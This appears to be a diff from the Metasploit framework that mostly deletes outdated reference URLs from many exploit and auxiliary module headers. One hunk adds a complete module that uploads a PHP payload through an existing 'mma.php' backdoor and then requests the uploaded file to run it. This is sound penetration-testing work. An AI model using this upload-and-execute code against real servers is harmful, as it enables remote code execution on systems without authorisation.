'DisclosureDate' => 'Oct 22 2008'))
|
||||
|
||||
|
|
|
@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3995' ],
|
||||
[ 'OSVDB', '49320'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ],
|
||||
[ 'OSVDB', '49320']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 22 2008'))
|
||||
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2008-3982'],
|
||||
[ 'OSVDB', '49324'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 13 2008'))
|
||||
|
||||
|
|
|
@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2007-5511'],
|
||||
[ 'OSVDB', '40079'],
|
||||
[ 'BID', '26098' ],
|
||||
[ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 17 2007'))
|
||||
|
|
|
@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2008-3983'],
|
||||
[ 'OSVDB', '49325'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
|
||||
|
||||
],
|
||||
|
|
|
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3984' ],
|
||||
[ 'OSVDB', '49326'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
|
||||
[ 'OSVDB', '49326']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 13 2008'))
|
||||
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
['OSVDB', '8573'],
|
||||
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
|
||||
['OSVDB', '8573']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w{ irix unix },
|
||||
|
|
|
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['EDB', '36577'],
|
||||
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
|
||||
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
|
||||
],
|
||||
'Targets' =>
|
||||
|
|
|
@ -24,9 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2006-1148'],
|
||||
['OSVDB', '23777'],
|
||||
['BID', '17040'],
|
||||
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
|
||||
|
||||
['BID', '17040']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4828'],
|
||||
['OSVDB', '77183'],
|
||||
['BID', '50706'],
|
||||
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
|
||||
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
|
||||
],
|
||||
'Payload' =>
|
||||
|
|
|
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['OSVDB', '85344'],
|
||||
['OSVDB', '85345'],
|
||||
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
|
||||
['OSVDB', '85345']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -25,8 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2005-3252'],
|
||||
['OSVDB', '20034'],
|
||||
['BID', '15131'],
|
||||
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
|
||||
['BID', '15131']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -50,8 +50,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[
|
||||
[ 'CVE', '2009-2692' ],
|
||||
[ 'OSVDB', '56992' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
|
||||
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ]
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2011-0923'],
|
||||
[ 'OSVDB', '72526'],
|
||||
[ 'ZDI', '11-055'],
|
||||
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
|
||||
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
|
||||
[ 'URL', 'https://community.rapid7.com/thread/2253' ]
|
||||
],
|
||||
|
|
|
@ -47,8 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'BID', '37943' ],
|
||||
[ 'BID', '37974' ],
|
||||
[ 'OSVDB', '61956' ],
|
||||
[ 'URL', 'http://secunia.com/advisories/38344/' ],
|
||||
[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]
|
||||
[ 'URL', 'http://secunia.com/advisories/38344/' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
|
|
|
@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2015-0936'],
|
||||
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
|
||||
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
|
||||
],
|
||||
'DisclosureDate' => "Apr 01 2015", # Not a joke
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2012-3579'],
|
||||
['OSVDB', '85028'],
|
||||
['BID', '55143'],
|
||||
['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
|
|
@ -37,8 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '50500'],
|
||||
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
|
||||
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
|
||||
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
|
||||
],
|
||||
'Platform' => %w{ linux osx solaris win },
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2009-3869' ],
|
||||
[ 'OSVDB', '59710' ],
|
||||
[ 'BID', '36881' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
|
||||
[ 'ZDI', '09-078' ],
|
||||
[ 'ZDI', '09-078' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -38,9 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' => [ 'natron' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
|
||||
# list of trusted Certificate Authorities by java version
|
||||
[ 'URL', 'http://www.spikezilla-software.com/blog/?p=21' ]
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
|
||||
],
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2006-3677'],
|
||||
['OSVDB', '27559'],
|
||||
['BID', '19192'],
|
||||
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
|
||||
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
|
||||
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2014-3996' ],
|
||||
[ 'OSVDB', '110198' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/55' ]
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2014-5301'],
|
||||
['OSVDB', '116733'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
|
|
|
@ -0,0 +1,111 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'nokogiri'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
|
||||
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
|
||||
operating system version because of the php_uname() function.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jay Turla <@shipcod3>',
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 10000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['mma file uploader', {} ]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 2 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
|
||||
],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
|
||||
end
|
||||
|
||||
def has_input_name?(nodes, name)
|
||||
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if res
|
||||
n = ::Nokogiri::HTML(res.body)
|
||||
form = n.at('form[@id="uploader"]')
|
||||
inputs = form.search('input')
|
||||
if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
payload_name = "#{rand_text_alpha(5)}.php"
|
||||
|
||||
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
|
||||
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
|
||||
post_data = data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.body =~ /uplod d0n3 in SAME file/
|
||||
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
|
||||
register_files_for_cleanup(payload_name)
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Connection Timed Out')
|
||||
end
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(payload_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
|
@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2012-0261'],
|
||||
['OSVDB', '78064'],
|
||||
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
|
||||
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
|
||||
['URL', 'http://secunia.com/advisories/47417/'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2012-0262'],
|
||||
['OSVDB', '78065'],
|
||||
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
|
||||
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
|
||||
['URL', 'http://secunia.com/advisories/47417/'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2014-6034' ],
|
||||
[ 'OSVDB', '112276' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ "CVE", "2012-3153" ],
|
||||
[ "OSVDB", "86395" ], # Matches CVE-2012-3152
|
||||
[ "OSVDB", "86394" ], # Matches CVE-2012-3153
|
||||
[ "EDB", "31253" ],
|
||||
[ 'URL', "http://netinfiltration.com" ]
|
||||
[ "EDB", "31253" ]
|
||||
],
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Platform' => ['win', 'linux'],
|
||||
|
|
|
@ -32,8 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4075'],
|
||||
['OSVDB', '76594'],
|
||||
['BID', '50331'],
|
||||
['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],
|
||||
['EDB', '18021'],
|
||||
['EDB', '18021']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here
|
||||
['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/']
|
||||
],
|
||||
'DisclosureDate' => 'Apr 11 2013',
|
||||
|
|
|
@ -35,9 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'BID', '51061' ],
|
||||
[ 'CVE', '2011-4642' ],
|
||||
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip' ]
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -36,8 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2012-0391'],
|
||||
[ 'OSVDB', '78277'],
|
||||
[ 'EDB', '18329'],
|
||||
[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
|
||||
[ 'EDB', '18329']
|
||||
],
|
||||
'Platform' => %w{ java linux win },
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -35,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2012-0394'],
|
||||
[ 'OSVDB', '78276'],
|
||||
[ 'EDB', '18329'],
|
||||
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
|
||||
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
|
||||
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ]
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue